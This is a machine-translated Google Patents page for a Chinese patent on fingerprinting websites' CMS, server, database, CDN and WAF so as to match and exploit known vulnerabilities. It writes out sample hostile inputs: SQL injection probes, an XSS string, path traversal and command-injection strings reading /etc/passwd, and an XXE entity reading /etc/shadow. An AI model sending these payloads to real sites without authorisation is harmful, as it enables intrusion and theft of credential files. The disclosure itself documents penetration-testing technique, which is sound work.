CN115941280B - Penetration method, device, equipment and medium based on web fingerprint information - Google Patents
Penetration method, device, equipment and medium based on web fingerprint information Download PDFInfo
- Publication number
- CN115941280B CN115941280B CN202211408295.7A CN202211408295A CN115941280B CN 115941280 B CN115941280 B CN 115941280B CN 202211408295 A CN202211408295 A CN 202211408295A CN 115941280 B CN115941280 B CN 115941280B
- Authority
- CN
- China
- Prior art keywords
- information
- penetration
- fingerprint
- site
- fingerprint information
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 230000035515 penetration Effects 0.000 title claims abstract description 102
- 238000000034 method Methods 0.000 title claims abstract description 48
- 238000001514 detection method Methods 0.000 claims abstract description 47
- 238000011161 development Methods 0.000 claims description 23
- 230000008595 infiltration Effects 0.000 claims description 22
- 238000001764 infiltration Methods 0.000 claims description 22
- 238000004590 computer program Methods 0.000 claims description 10
- 230000003068 static effect Effects 0.000 claims description 9
- 238000013507 mapping Methods 0.000 claims description 4
- 238000010276 construction Methods 0.000 claims description 2
- 239000012466 permeate Substances 0.000 claims 4
- 230000004044 response Effects 0.000 description 7
- 238000013515 script Methods 0.000 description 6
- 238000007726 management method Methods 0.000 description 4
- 235000014510 cooky Nutrition 0.000 description 3
- 238000010586 diagram Methods 0.000 description 3
- 230000000694 effects Effects 0.000 description 3
- 238000005516 engineering process Methods 0.000 description 3
- 238000002347 injection Methods 0.000 description 3
- 239000007924 injection Substances 0.000 description 3
- 241001465754 Metazoa Species 0.000 description 2
- 230000002159 abnormal effect Effects 0.000 description 2
- 238000004458 analytical method Methods 0.000 description 2
- 230000005540 biological transmission Effects 0.000 description 2
- 230000000903 blocking effect Effects 0.000 description 2
- 230000004048 modification Effects 0.000 description 2
- 238000012986 modification Methods 0.000 description 2
- 230000008569 process Effects 0.000 description 2
- 239000000523 sample Substances 0.000 description 2
- 241000931705 Cicada Species 0.000 description 1
- 241000282326 Felis catus Species 0.000 description 1
- 238000013459 approach Methods 0.000 description 1
- 230000009286 beneficial effect Effects 0.000 description 1
- 239000003795 chemical substances by application Substances 0.000 description 1
- 239000004744 fabric Substances 0.000 description 1
- 238000001914 filtration Methods 0.000 description 1
- 230000006870 function Effects 0.000 description 1
- 230000006872 improvement Effects 0.000 description 1
- 230000003287 optical effect Effects 0.000 description 1
- 230000000149 penetrating effect Effects 0.000 description 1
- 210000004258 portal system Anatomy 0.000 description 1
- 230000002265 prevention Effects 0.000 description 1
- 230000007115 recruitment Effects 0.000 description 1
- 239000010979 ruby Substances 0.000 description 1
- 229910001750 ruby Inorganic materials 0.000 description 1
- 239000000243 solution Substances 0.000 description 1
- 238000012360 testing method Methods 0.000 description 1
- 230000001960 triggered effect Effects 0.000 description 1
Abstract
The embodiment of the invention provides a penetration method, a device, equipment and a medium based on web fingerprint information, wherein the method comprises the following steps: judging penetration targets according to the website building form, and determining penetration ideas of one or more fingerprint information aiming at each penetration target; analyzing all site information of the penetration target, and determining a fingerprint detection object; according to a preset priority order, determining fingerprint information according to a penetration thought of the fingerprint information and an object of fingerprint detection, and performing penetration according to the fingerprint information. The method realizes the judgment of the web fingerprint information with multiple categories, multiple types and larger range, so that the judgment result is more accurate. And fingerprint information is determined according to a preset priority order, so that the efficiency is higher.
Description
Technical Field
The invention relates to the technical field of automatic testing, in particular to a penetration method, device, equipment and medium based on web fingerprint information.
Background
Searching and matching known vulnerabilities through fingerprint information of websites, and performing vulnerability detection and vulnerability exploitation, so as to achieve the purpose of penetrating websites, obtain website rights or obtain website data and the like. The prior art discloses a vulnerability detection method and device based on web fingerprint information, wherein the method comprises the following steps: determining a web site of a penetration target, wherein the penetration target is a network system connected through a network; collecting web fingerprint information of the web site; and detecting the external vulnerability of the penetration target by using the web fingerprint information. However, the fingerprint information acquisition of the scheme is not accurate enough, the range is not large enough, and the matching loopholes are not accurate enough.
Disclosure of Invention
In view of the above, the embodiment of the invention provides a web fingerprint information-based infiltration method, device, equipment and medium, which are used for solving the technical problems of inaccurate fingerprint information acquisition, insufficient range and inaccurate matching loopholes in the prior art. The method comprises the following steps:
judging penetration targets according to the website building form, and determining penetration ideas of one or more fingerprint information aiming at each penetration target;
analyzing all site information of the penetration target, and determining a fingerprint detection object;
according to a preset priority order, determining fingerprint information according to a penetration thought of the fingerprint information and an object of fingerprint detection, and performing penetration according to the fingerprint information.
The embodiment of the invention also provides a penetration device based on the web fingerprint information, which comprises:
the permeation thinking module is used for judging permeation targets according to the website building form and determining permeation thinking of one or more fingerprint information according to each permeation target;
the object module is used for acquiring fingerprint detection and analyzing all site information of the penetration target to determine a fingerprint detection object;
and the fingerprint information penetration module is used for determining fingerprint information according to the penetration thought of the fingerprint information and the object detected by the fingerprint, and performing penetration according to the fingerprint information.
The embodiment of the invention also provides computer equipment, which comprises a memory, a processor and a computer program stored on the memory and capable of running on the processor, wherein the processor realizes any penetration method based on the web fingerprint information when executing the computer program.
Embodiments of the present invention also provide a computer-readable storage medium storing a computer program for executing any of the web fingerprint information-based penetration methods described above.
Compared with the prior art, the beneficial effects that above-mentioned at least one technical scheme that this description embodiment adopted can reach include at least:
judging penetration targets according to website building forms, determining penetration ideas of one or more fingerprint information according to each penetration target, analyzing all website information of the penetration targets, and determining fingerprint detection objects, namely, enabling the penetration targets to be websites in different website building forms, and determining the fingerprint detection objects based on all website information, so that the fingerprint detection objects can be more diversified, further, web fingerprint information collection with multiple categories, multiple types and a larger range is facilitated, and accuracy of matching holes based on web fingerprint information is improved; in addition, fingerprint information is determined according to a preset priority order, so that the efficiency of collecting the fingerprint information is improved.
Drawings
In order to more clearly illustrate the technical solutions of the embodiments of the present application, the drawings that are needed in the embodiments will be briefly described below, and it is obvious that the drawings in the following description are only some embodiments of the present application, and that other drawings may be obtained according to these drawings without inventive effort for a person skilled in the art.
FIG. 1 is a flow chart of a web fingerprint information based infiltration method provided by an embodiment of the present invention;
FIG. 2 is a block diagram of a computer device according to an embodiment of the present invention;
fig. 3 is a block diagram of a penetration apparatus based on web fingerprint information according to an embodiment of the present invention.
Detailed Description
Embodiments of the present application are described in detail below with reference to the accompanying drawings.
Other advantages and effects of the present application will become apparent to those skilled in the art from the present disclosure, when the following description of the embodiments is taken in conjunction with the accompanying drawings. It will be apparent that the described embodiments are only some, but not all, of the embodiments of the present application. The present application may be embodied or carried out in other specific embodiments, and the details of the present application may be modified or changed from various points of view and applications without departing from the spirit of the present application. It should be noted that the following embodiments and features in the embodiments may be combined with each other without conflict. All other embodiments, which can be made by one of ordinary skill in the art based on the embodiments herein without making any inventive effort, are intended to be within the scope of the present application.
The Web fingerprint identification is a relatively important step in the penetration test-information collection link, and by means of some open-source tools, platforms or manual modes and the like, the detection of whether the CMS system is a published CMS program or secondary development is important, and the accurate acquisition of CMS type, web service component type and version information can help security engineers to quickly and effectively verify known vulnerabilities.
A content management system (Content Management System, CMS), which is a software system located between the WEB front-end (WEB server) and the back-end office or process (content authoring, editing).
And the content delivery network (Content Delivery Network, CDN) is a content delivery network constructed on the network, and the CDN enables users to obtain required content nearby by means of load balancing, content delivery, scheduling and other functional modules of the central platform by means of edge servers deployed in various places, so that network congestion is reduced, and user access response speed and hit rate are improved.
A Web application level intrusion prevention system (Web Application Firewall, WAF), which is a product that provides protection specifically for Web applications by enforcing a range of security policies for HTTP/HTTPs.
In an embodiment of the present invention, a web fingerprint information-based penetration method is provided, as shown in fig. 1, where the method includes:
and firstly, judging penetration targets according to the website building form, and determining penetration ideas of one or more fingerprint information aiming at each penetration target.
Specifically, the forms of construction are classified into the following categories:
1. a multi-directory site;
different entries are available at the same site, for example www.xxx.com, www.xxx.com/bbs, www.xxx.com/old.
2. A multiport site;
there are different ports at the same site, for example www.zzz.com, www.zzz.com:8080, www.zzz.com:8888.
3. A multi-domain name site;
the same site has different domain names, for example www.yyy.com, bbs.
4. A multi-client site;
the clients of the same site include a PC side and a mobile side, for example, www.yyy.com, m.yyy.com.
In particular embodiments, the penetration target comprises any one or any combination of the following:
a main catalog site and a sub catalog site of the multi catalog site;
each port of the multi-port site;
a website of a multi-domain name site;
PC end site and mobile end site of the multi-client site.
In specific implementation, according to the four building forms, the following permeation ideas are respectively corresponding to:
the website of the multi-catalog site can be composed of a plurality of cms or frames, so that the penetration target is a plurality of targets, namely each catalog site of the same website uses a penetration method;
a website of a multi-port site may be composed of a plurality of ports or frames, and then for infiltration, the goal of infiltration is a plurality of ports, namely each port of the same website uses one infiltration method;
the website of the multi-domain name website, the domain name and the master station can be possibly connected with a server or the same network segment, and the domain name penetration can be directly connected with the master station, namely, a plurality of domain name websites of the same website use the same penetration method;
the multi-client site, the PC end and the mobile end framework program are different, and the mobile end site needs to be additionally tested. I.e. the PC side and the mobile side of the same website use different penetration methods.
And secondly, analyzing all site information (whole site information) of the penetration target to determine the object of fingerprint detection.
In specific implementation, the analysis of the whole station information can be divided into the following categories:
1. server type.
There are a variety of server types, such as:
windows: server 2003, server 2008, server 2012, server 2016, and the like.
Linux: centOS, RHEL, ubuntu Server, debian, etc.
The method can adopt a PING command or a mode of modifying webpage suffix prompt feedback information to remotely judge the server type of a website, obtain a server version through nmap scanning according to the server type after obtaining the server type, and determine an application server, IP, domain name information and port information as objects of fingerprint detection according to the server type and the server version.
Specifically, the determination of the operating system type (i.e., server type) may employ Ping commands to probe: the TTL value of Windows is typically 128, while that of Linux is 64. Therefore, when the detected TTL value is greater than 100, the operating system type can be generally judged to be Windows, and when the detected TTL value is tens of times, the operating system type can be generally judged to be Linux.
Specifically, the judgment of the version of the target web server may be performed by nmap, and the-O and-a parameters may be used.
2. Website container type.
Judging the type of a container of a website through the type of the server and the version of the server, judging the type of software and the version of the software of the Web server according to the type of the container, analyzing the vulnerability of the Web server, and determining the Web server as an object of fingerprint detection according to the analyzed vulnerability.
Specifically, the type of the web server for the website can be determined by the server type. There are a variety of types of web servers, such as:
apache, nginx, tomcat is also IIS. After the type of the web server is obtained, a specific version of the web server can be detected, and a detection object web server can be obtained.
Some fingerprint-detected objects have vulnerabilities themselves, such as an nmnix version <0.83 would have a resolution vulnerability, IIS6.0 would have a file name resolution vulnerability, IIS7.0 would have a malformed resolution vulnerability, etc. Different web server versions have different vulnerabilities, so that according to the resolved vulnerabilities, the web server with the vulnerabilities can be used as an object of fingerprint detection.
3. Script type.
And judging the script type of the Web server side through the software type and the software version of the Web server side, and further determining the development language as an object of fingerprint detection.
Specifically, the detection object development language can be obtained by judging the script type. Such as the commonly used development language PHP, JSP, ASP, ASPX, etc.
4. Database type.
Judging the type of a database through system table information or according to system variables of a server prestored in the database, and determining a development language as an object of fingerprint detection according to the type of the database.
Specifically, it is necessary to determine the type of database used by the website, for example: mySQL, oracle, sqlServer or Access. The grammar of the database is substantially the same, and the development language is determined based on the database type and the database version, which are slightly different from each other, so that the type and the version of the database used by the target website are acquired.
The database type can be determined by a system table or according to a system variable of a server pre-stored in the database. For example, the system table of ACCESS is msysobjects and has no ACCESS rights in a WEB environment, while the system table of SQL SERVER is sysobobjects and has ACCESS rights in a WEB environment.
For example, the following two statements are used:
1.HTTP://xxx.xxx.xxx/abc.aspp=YY and(select count(*)from msysobjects)>0
2.HTTP://xxx.xxx.xxx/abc.aspp=YY and(select count(*)from sysobjects)>0
if the database is ACCESS, both of the two databases will be abnormal. If the database is SQL SERVE, the second abc. Asp is always operated normally, and the first abc. Asp is abnormal.
The following common scripts are matched with the database: ASP and ASPX: ACCESS, SQL ServerPHP: mySQL, postgreSQL; JSP: oracle, mySQL, the detected object development language is obtained.
And thirdly, determining fingerprint information according to the penetration thought of the fingerprint information and the object detected by the fingerprint according to a preset priority order.
In the Web penetration process, web fingerprint identification is an important step in an information collection link, and detection of whether a CMS system is a published CMS program or secondary development is important through a plurality of open-source tools, platforms or manual modes and the like, so that the security engineer can be helped to quickly and effectively verify known vulnerabilities by accurately acquiring CMS types, web service component types and version information.
The object of fingerprint detection may be:
1) CMS information: such as CMS of chinese, dream of fabric, empire CMS, phpcms, ecshop, etc.;
2) Front-end technology: such as HTML5, jquery, bootstrap, pure, ace, etc.;
3) The Web server: such as Apache, lighttpd, nmginx, IIS, etc.;
4) The application server: such as Tomcat, jboss, weblogic, websphere, etc.;
5) Development language: such as PHP, java, ruby, python, C # and the like;
6) Operating system information: such as RHEL, win2008, centos, etc.;
7) CDN information: whether CDNs are used, such as clodfire, 360CDN, 365cyd, yunjiasu, etc.;
8) WAF information: whether waf is used, e.g., topsec, jiasule, yundun, etc.;
9) IP and domain name information: IP and domain name registration information, service provider information, etc.
10 Port information): some software or platforms may also probe common ports that are open to servers.
In the implementation, the main goal of infiltration is CMS, but there may be a safeguard measure for the target website in the actual infiltration, so when the CMS cannot be infiltrated, fingerprints of CDNs and WAFs can be identified, so that a more accurate identification effect can be achieved. The preset priority order of the objects of fingerprint detection from high to low may be: CMS information, CDN information, WAF information.
In practice, the CMS is a content management system, and most websites are content managed by the CMS. CMS includes blogs, microblogs, malls, etc. These websites are built based on a series of open-source website building systems. Such as discoz to build forums, worfpress to build blog web sites.
Different types of websites will use different open source CMS systems:
1. an enterprise station building system: metInfo (Mituo), cicada, siteServer CMS, etc.;
2. B2C mall system: business group Shopex, ECshop, hiShop, xpShop, etc.;
3. portal site system: dedeCMS (dream), empire CMS, PHPCMS, animal and animal origin, cmsTop and the like;
4. a blog system: wordPress, Z-Blog, etc.;
5. forum community: discuz, PHPwind, weCenter, etc.;
6. question-answering system: tipask, whatsns, etc.;
7. knowledge encyclopedia system: HDwiki;
8. B2B portal system: deston, B2Bbuilder, friend B2B, etc.;
9. talent recruitment website system: a cavalier CMS and PHP cloud talent management system;
10. real estate website system: fangCms, et al;
11. on-line education station building system: kesion, eduSoho;
12. movie website system: apple CMS, ctcms, movcms, etc.;
13. station building system for novel literature: jegili CMS.
If we open a website and identify the program (i.e. the type and version of software used) for that website, we can then conduct the penetration of the fingerprint information.
In implementation, fingerprint information may be determined according to the penetration concept of the fingerprint information and the object of fingerprint detection, for example, in the following manner:
judging the type of a static file according to the station building form and the whole station information of a server side, grabbing an md5 value according to the type of the static file, and obtaining CMS information corresponding to the grabbed md5 value according to the mapping relation between the md5 and the CMS in a rule base;
determining the corresponding relation between keywords and CMS information, acquiring the keywords in a home page or a designated page by accessing the home page or the designated page, matching the acquired keywords with the corresponding relation between the keywords and the CMS information, and acquiring the CMS information corresponding to the acquired keywords according to a matching result;
identifying the CMS information by means of the canner information;
judging the CMS information according to the URL address;
utilizing a crawler to acquire dynamic links, and judging development languages used by a server according to the dynamic links;
the development language used By the server is identified through X-Powered-By or Set-Cookie.
In practice, the CMS may be identified by some specific file or code, such as:
1. copyright information.
1) The CMS information may be obtained by knowing the copyright information of a website, and the copyright information may be directly available at the bottom of the website.
2) Clicking on the web tab query, some websites directly click on the web tab to determine the CMS system.
2. Md5 of the particular file.
Some md5 values may be found to determine the CMS system of the website.
The md5 value corresponding to each file is fixed, and when the content of the file changes, the md5 value also changes. When the file contents are the same, the md5 value is the same. Therefore, the md5 value can be used as a unique identifier for the file.
Some static files that are not easily changed are queried to determine what system is. For example, static files such as picture files, js files, CSS (client S) of some websites, such as favicon. Ico, CSS, logo. Ico, js and the like, are not modified, and the files are subjected to md5 value grabbing through a crawler and are compared with the mapping relation between md5 in a rule base and CMS, if the values are consistent with md5 in the rule base, the corresponding CMS is indicated. This approach is faster and has a relatively low false positive rate, but does not exclude that some secondarily developed CMSs will modify these files.
3. The web page source code is viewed.
What system is used can be analyzed by right-clicking the query source code. For example, the website of wedpress has many wp heads in the source code, which basically confirms that the wedpress system is used.
4. By a specific file analysis.
By analyzing the content of some specific files, for example, the corresponding relation between the keywords and the CMS information can be determined according to keywords contained in the historical normal pages or the error web pages, the keywords in the first page or the specific page can be obtained by accessing the first page or the specific page (such as robots. Txt) and the like, the obtained keywords are matched with the corresponding relation between the keywords and the CMS information in a regular way, and the keywords such as Powered by Discuz, decms and the like can obtain the CMS information corresponding to the obtained keywords.
And judging the used CMS or middleware information, such as the error reporting page of the tomcat, according to the error reporting information by using n/n or constructing the error page.
5. Keyword matching of header information is requested.
CMS information is identified according to the header information returned by the website response, the http response header, cookies, server information and the router information of the routing exchange equipment and the like. The wwatweb and Wappalyzer are the methods for quickly identifying fingerprints through the banner information, and the web fingerprint library of the prior fofa is widely used, so that the efficiency is very high, and the basic request can be carried out once.
There are generally several ways to identify CMS information based on response header:
1) Looking at the X-Powered-By field of the http response header to identify;
2) Judging according to Cookies, for example, some wafs can contain some information in a return header, such as 360wzws, safedog, yunsuo;
3) Judging according to Server information in the header, such as DVRDVS-Webs, yunjiasu-nginx, mod_ Security, nginx-wallarm and the like;
4) Some routing switches may have this field, for example NETCORE, huawei, h c, at the discretion of the WWW-authentication.
5) Keywords contained in partial URLs
URL key features such as wp-includes, dede.
And detecting whether a corresponding catalogue exists or not through a rule base, analyzing the link URL according to a crawler result, detecting the catalogue in the robots. For example, the wordpress defaults to have wp-include and wp-admin directories, the dream defaults to manage the background as de directory, the solr platform may use/solr directory, the weblogic may use wls-wsat directory, etc.
6. And (5) developing language identification.
web development languages are generally known as PHP, jsp, aspx, asp, etc., and the recognition modes are as follows:
1) The dynamic link is obtained through the crawler, and the development language used by the server is directly judged based on the dynamic link, so that the method is simpler and more convenient.
For example: the asp discriminant rule is < a > ]? href= (' ") [ ζp ] is? \. asp (;
2) Identifying through X-Powered-By;
for example, X-Powered-By: ASP.NET or X-Powered-By: PHP/7.1.8, etc.
3) Identifying through Set-Cookie;
for example, the Set-Cookie includes php described by PHPSSIONID, java described by JESSIONID, aspx described by ASP.NET_SessionId, and the like.
In specific implementation, CDN fingerprinting is:
1. identifying a super ping;
2. identifying a historical DNS;
3. inquiring IP through the subdomain name;
4. analyzing by a foreign host;
5. and (5) other identification.
WAF (Web Application Firewall) is a Web application firewall filtering HTTP/HTTPs requests to identify malicious parameters and malicious requests. WAF has many roles:
1. SQL Injection (SQLi): preventing SQL injection;
2. cross Site Scripting (XSS): preventing cross-site scripting attack;
3. local File Inclusion (LFI): preventing attacks by utilizing vulnerabilities contained in local files;
4. remote File Inclusione (RFI): preventing attacks by utilizing the vulnerability contained in the remote file;
5. remote Code Execution (RCE): preventing attacks by utilizing remote command execution loopholes;
6. PHP Code Injectiod: preventing PHP code injection;
7. HTTP Protocol Violations: preventing malicious access violating the HTTP protocol;
8. HTTPoxy: preventing attacks by using remote agent infected vulnerabilities;
9. sshlldock: preventing attacks by using a shelllock vulnerability;
10. session Fixation: preventing attack by utilizing vulnerabilities with unchanged Session ID;
11. scanner Detection: preventing hackers from scanning websites;
12. Metadata/Error leakage: preventing source code/error information leakage;
13. project Honey Pot Blacklist: a honeypot project blacklist;
14. GeoIP Country Blocking: and performing IP blocking according to the judgment of the attribution of the IP address.
In particular implementations, WAF fingerprinting is used to identify the following:
1. the WAF vendor is identified.
1) Different vendors are determined based on different interception pages.
2) The firewall is triggered by an illegal parameter and then fingerprinting is performed using a wafw00f or namp tool.
Illegal parameters include: additional cookies; any additional headers for the response or request; by responding to the content (if blocked from the request); response code (if blocked from request); IP address (cloud WAF); JS client module (client WAF).
For example:
xsstring='<script>alert("XSS");</script>'
sqlistring="UNION SELECT ALL FROM information_schema AND'or SLEEP(5)or'"
lfistring='../../../../etc/passwd'
rcestring='/bin/cat/etc/passwd;ping 127.0.0.1;
curl google.com'
xxestring='<!ENTITY xxe SYSTEM"file:///etc/shadow">]><pwn>&hack;</pwn>'。
in specific implementation, fingerprint information is obtained, and accurate penetration based on the fingerprint information can be achieved by, for example, determining a vulnerability according to the fingerprint information, and performing penetration based on the vulnerability through exp when determining that the vulnerability exists. According to the obtained web fingerprint information, loophole matching is carried out, whether the matched loophole exists or not is detected through a loophole poc, and if the loophole exists, penetration is carried out through exp based on the matched loophole.
In this embodiment, a computer device is provided, as shown in fig. 2, including a memory 201, a processor 202, and a computer program stored on the memory and executable on the processor, where the processor implements any of the above web fingerprint information based penetration methods when executing the computer program.
In particular, the computer device may be a computer terminal, a server or similar computing means.
In the present embodiment, a computer-readable storage medium storing a computer program for executing any of the web fingerprint information-based penetration methods described above is provided.
In particular, the computer device may be a computer terminal, a server or similar computing means.
In the present embodiment, a computer-readable storage medium storing a computer program for executing any of the web fingerprint information-based penetration methods described above is provided.
In particular, computer-readable storage media, including both permanent and non-permanent, removable and non-removable media, may be used to implement information storage by any method or technology. The information may be computer readable instructions, data structures, modules of a program, or other data. Examples of computer-readable storage media include, but are not limited to, phase-change memory (PRAM), static Random Access Memory (SRAM), dynamic Random Access Memory (DRAM), other types of Random Access Memory (RAM), read Only Memory (ROM), electrically Erasable Programmable Read Only Memory (EEPROM), flash memory or other memory technology, compact disc read only memory (CD-ROM), digital Versatile Disks (DVD) or other optical storage, magnetic cassettes, magnetic tape magnetic disk storage or other magnetic storage devices, or any other non-transmission medium, which can be used to store information that can be accessed by a computing device. Computer-readable storage media, as defined herein, does not include transitory computer-readable media (transmission media), such as modulated data signals and carrier waves.
Based on the same inventive concept, the embodiment of the invention also provides a penetration device based on web fingerprint information, as described in the following embodiment. Since the principle of the web fingerprint information-based infiltration device for solving the problem is similar to that of the web fingerprint information-based infiltration method, the implementation of the web fingerprint information-based infiltration device can be referred to the implementation of the web fingerprint information-based infiltration method, and the repetition is omitted. As used below, the term "unit" or "module" may be a combination of software and/or hardware that implements the intended function. While the means described in the following embodiments are preferably implemented in software, implementation in hardware, or a combination of software and hardware, is also possible and contemplated.
Fig. 3 is a block diagram of a web fingerprint information based infiltration apparatus according to an embodiment of the present invention, as shown in fig. 3, including:
the penetration thinking module 301 for obtaining fingerprint information is configured to determine penetration targets according to a website building form, and determine one or more penetration thinking of fingerprint information for each penetration target;
the object module 302 for obtaining fingerprint detection is configured to analyze all site information of the penetration target according to a preset priority order, and determine an object of fingerprint detection;
the fingerprint information infiltration module 303 is configured to determine fingerprint information according to a preset priority order, according to an infiltration idea of the fingerprint information and an object detected by the fingerprint, and perform infiltration according to the fingerprint information.
In one embodiment, the object of fingerprint detection comprises any one or any combination of the following: CMS information, CDN information, and WAF information. The preset priority order is from high to low: CMS information, CDN information, WAF information.
In one embodiment, a permeation thinking module for acquiring fingerprint information includes:
a penetration idea determining unit for determining a penetration idea for each CMS, the penetration idea comprising: each catalog site of the same website uses a penetration method, each port of the same website uses a penetration method, a plurality of domain name sites of the same website use the same penetration method, and a PC end and a mobile end of the same website use different penetration methods.
In one embodiment, an object module for taking fingerprint detection includes:
the first fingerprint detection object determining unit is used for remotely judging the server type of the website by adopting a PING command or modifying the mode of prompting feedback information by the webpage suffix, acquiring a server version through nmap scanning according to the server type after acquiring the server type, and determining an application server, IP, domain name information and port information as fingerprint detection objects according to the server type and the server version;
the second fingerprint detection object determining unit is used for judging the type of a container of the website through the type of the server and the version of the server, judging the type of software and the version of software of the Web server according to the type of the container, analyzing the vulnerability of the Web server according to the type of software and the version of software of the Web server, and determining the Web server as a fingerprint detection object according to the analyzed vulnerability;
and the third fingerprint detection object determining unit is used for determining the development language as a fingerprint detection object according to the software type and the software version of the Web server, judging the type of the database through system table information or according to the system variable of the server prestored in the database, and determining the development language as the fingerprint detection object according to the type of the database.
In one embodiment, the fingerprint information penetration module comprises:
the first CMS information determining unit is used for judging the type of the static file through the station building form and the whole station building information of the server side, grabbing an md5 value according to the type of the static file, and obtaining CMS information corresponding to the grabbed md5 value according to the mapping relation between the md5 and the CMS in the rule base;
the second CMS information determining unit is used for determining the corresponding relation between the keywords and the CMS information, acquiring the keywords in the home page or the appointed page by accessing the home page or the appointed page, matching the acquired keywords with the corresponding relation between the keywords and the CMS information, and acquiring the CMS information corresponding to the acquired keywords according to a matching result;
a third CMS information determination unit for identifying CMS information by the canner information;
a fourth CMS information determining unit configured to determine the CMS information according to the URL address;
the first development language determining unit is used for acquiring dynamic links by utilizing the crawlers and judging development languages used by the server according to the dynamic links;
and the second development language determining unit is used for identifying the development language used By the server through the X-Powered-By or Set-Cookie.
In one embodiment, the fingerprint information penetration module comprises:
and the infiltration unit is used for determining the loopholes according to the fingerprint information, and performing infiltration based on the loopholes through exp when the existence of the loopholes is determined.
The embodiment of the invention realizes the following technical effects:
the web fingerprint information judging method with multiple categories, multiple types and larger range is realized, so that the judging result is more accurate; the fingerprint information is determined according to the preset priority order, so that the efficiency is higher; matching the loopholes according to a more accurate web fingerprint information judgment result, and detecting whether the loopholes really exist or not through a loophole poc; after confirming existence of the vulnerability, performing vulnerability utilization through exp, and achieving the purpose of accurate penetration target.
It will be apparent to those skilled in the art that the modules or steps of the embodiments of the invention described above may be implemented in a general purpose computing device, they may be concentrated on a single computing device, or distributed across a network of computing devices, they may alternatively be implemented in program code executable by computing devices, so that they may be stored in a storage device for execution by computing devices, and in some cases, the steps shown or described may be performed in a different order than what is shown or described, or they may be separately fabricated into individual integrated circuit modules, or a plurality of modules or steps in them may be fabricated into a single integrated circuit module. Thus, embodiments of the invention are not limited to any specific combination of hardware and software.
The above description is only of the preferred embodiments of the present invention and is not intended to limit the present invention, and various modifications and variations can be made to the embodiments of the present invention by those skilled in the art. Any modification, equivalent replacement, improvement, etc. made within the spirit and principle of the present invention should be included in the protection scope of the present invention.
Claims (6)
1. A web fingerprint information based penetration method, comprising the steps of:
judging penetration targets according to the website building form, and determining penetration ideas of one or more fingerprint information aiming at each penetration target;
the form of construction comprises any one or any combination of the following:
multi-directory sites, multi-port sites, multi-domain name sites, and multi-client sites;
the penetration target comprises any one or any combination of the following:
a main catalog site and a sub catalog site of the multi catalog site;
each port of the multi-port site;
a website of a multi-domain name site;
PC end site and mobile end site of the multi-client site;
determining one or more penetration ideas of fingerprint information for each penetration target, wherein the penetration ideas comprise:
determining a permeate idea for each CMS, the permeate idea comprising:
each catalog site of the same website uses a penetration method;
each port of the same website uses a permeation method;
multiple domain name sites of the same website use the same penetration method;
different penetration methods are used by the PC end and the mobile end of the same website;
analyzing all site information of the penetration target to determine a fingerprint detection object, wherein the fingerprint detection object comprises any one or any combination of the following components:
CMS information, CDN information, and WAF information;
the preset priority order of the fingerprint detection objects is from high to low: CMS information, CDN information, WAF information;
according to a preset priority order, fingerprint information is determined according to the permeation thought of the fingerprint information and the object detected by the fingerprint, permeation is performed according to the fingerprint information, a vulnerability is determined according to the fingerprint information, whether the matched vulnerability exists or not is detected through a vulnerability poc, and permeation is performed based on the vulnerability through exp when the existence of the vulnerability is determined.
2. The web fingerprint information based penetration method of claim 1, wherein analyzing all site information of the penetration target to determine the fingerprint-detected object comprises:
remotely judging the server type of a website by adopting a PING command or modifying webpage suffix prompt feedback information, acquiring the server type, acquiring a server version through nmap scanning according to the server type, and determining an application server, IP (Internet protocol), domain name information and port information as objects of fingerprint detection according to the server type and the server version;
judging the type of a container of a website through the type of the server and the version of the server, judging the type of software and the version of software of a Web server according to the type of the container, analyzing the vulnerability of the Web server according to the type of software and the version of software of the Web server, and determining the Web server as a fingerprint detection object according to the analyzed vulnerability;
according to the software type and the software version of the Web server, determining a development language as an object of fingerprint detection;
judging the type of a database according to system table information or according to system variables of a server prestored in the database, and determining a development language as an object of fingerprint detection according to the type of the database.
3. The web fingerprint information based penetration method according to any one of claims 1 to 2, wherein determining fingerprint information from a penetration idea of the fingerprint information and the fingerprint detected object comprises:
judging the type of a static file according to the website building form of the website and the site information, grabbing an md5 value according to the type of the static file, and obtaining CMS information corresponding to the grabbed md5 value according to the mapping relation between the md5 and the CMS in a rule base;
determining the corresponding relation between keywords and CMS information, acquiring the keywords in a home page or a designated page by accessing the home page or the designated page, matching the acquired keywords with the corresponding relation between the keywords and the CMS information, and acquiring the CMS information corresponding to the acquired keywords according to a matching result;
identifying the CMS information by means of the canner information;
judging the CMS information according to the URL address;
utilizing a crawler to acquire dynamic links, and judging development languages used by a server according to the dynamic links;
the development language used By the server is identified through X-Powered-By or Set-Cookie.
4. A web fingerprint information based penetration apparatus, comprising:
the system comprises a penetration thinking module for acquiring fingerprint information, a penetration thinking module for judging penetration targets according to website building forms, and determining one or more penetration thinking of the fingerprint information aiming at each penetration target, wherein the website building forms comprise any one or any combination of the following: multi-directory sites, multi-port sites, multi-domain name sites, and multi-client sites, the penetration goals include any one or any combination of the following: the method comprises the steps of determining one or more fingerprint information penetration ideas for each penetration target, wherein the penetration ideas comprise a main catalog site and a sub catalog site of a multi-catalog site, each port of a multi-port site, a website of a multi-domain name site, a PC (personal computer) end site and a mobile end site of a multi-client site, and the steps of: determining a permeate idea for each CMS, the permeate idea comprising: each catalog site of the same website uses a penetration method, each port of the same website uses a penetration method, a plurality of domain name sites of the same website use the same penetration method, and a PC end and a mobile end of the same website use different penetration methods;
the fingerprint detection object acquisition module is used for analyzing all site information of the penetration target to determine a fingerprint detection object, and the fingerprint detection object comprises any one or any combination of the following components: CMS information, CDN information, and WAF information; the preset priority order of the fingerprint detection objects is from high to low: CMS information, CDN information, WAF information;
the fingerprint information infiltration module is used for determining fingerprint information according to the infiltration thought of the fingerprint information and the object detected by the fingerprint according to a preset priority order, performing infiltration according to the fingerprint information, determining a vulnerability according to the fingerprint information, detecting whether the matched vulnerability exists through a vulnerability poc, and performing infiltration based on the vulnerability through exp when determining that the vulnerability exists.
5. A computer device comprising a memory, a processor and a computer program stored on the memory and executable on the processor, characterized in that the processor implements the web fingerprint information based penetration method of any one of claims 1 to 3 when executing the computer program.
6. A computer-readable storage medium, characterized in that the computer-readable storage medium stores a computer program that performs the web fingerprint information based infiltration method of any one of claims 1 to 3.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202211408295.7A CN115941280B (en) | 2022-11-10 | 2022-11-10 | Penetration method, device, equipment and medium based on web fingerprint information |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
